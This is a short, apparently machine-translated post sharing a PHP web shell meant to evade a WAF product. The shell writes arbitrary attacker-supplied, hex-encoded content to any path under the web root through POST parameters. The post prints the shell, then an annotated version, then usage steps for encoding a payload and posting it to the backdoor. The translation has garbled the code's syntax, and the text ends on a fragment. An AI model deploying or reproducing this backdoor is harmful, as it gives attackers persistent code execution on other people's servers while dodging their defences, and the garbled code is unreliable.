Sharing of pony php bypass dongle Detection

Sharing of pony php bypass dongle Detection
Directly run the Code:

<? Php $ p = realpath (dirname (_ FILE __). "/.. /"). $ _ POST ["a"]; $ t = $ _ POST ["B"]; $ tt = ""; for ($ I = 0; $ I <strlen ($ t); $ I + = 2) $ tt. = urldecode ("% ". substr ($ t, $ I, 2); @ fwrite (fopen ($ p, "w"), $ tt); echo "success! ";?>

Analysis and Exploitation & Overhead:

<? Php $ p = realpath (dirname (_ FILE __). "/.. /"). $ _ POST ["a"]; // define $ p as the physical path of the root directory + $ _ POST ["a"] content $ t = $ _ POST ["B"]; // defines $ t as $ _ POST ["B"] content $ tt = ""; // defines $ tt as null for ($ I = 0; $ I <strlen ($ t); $ I + = 2) $ tt. = urldecode ("% ". substr ($ t, $ I, 2); // for the number of cycles is $ t Length/2, add the code "% xx" to $ tt every cycle @ fwrite (fopen ($ p, "w"), $ tt ); // The Write File address is $ p and the content is $ ttecho "success! ";?>

Usage:
Encode the written content with a url, such as <? Php phpinfo ();?>
Encoded as: % 3C % 3F % 70% 68% 70% 20% 70% 68% 70% 69% 6E % 66% 6F % 28% 29% 3B % 3F % 3E
Remove % and get 3C3F70687020706870696E666F28293B3F3E.
Then access the backdoor and change the POST content:
A =/111.php& B = 3C3F70687020706870696E666F28293B3F3E
You can write content.

Overdog: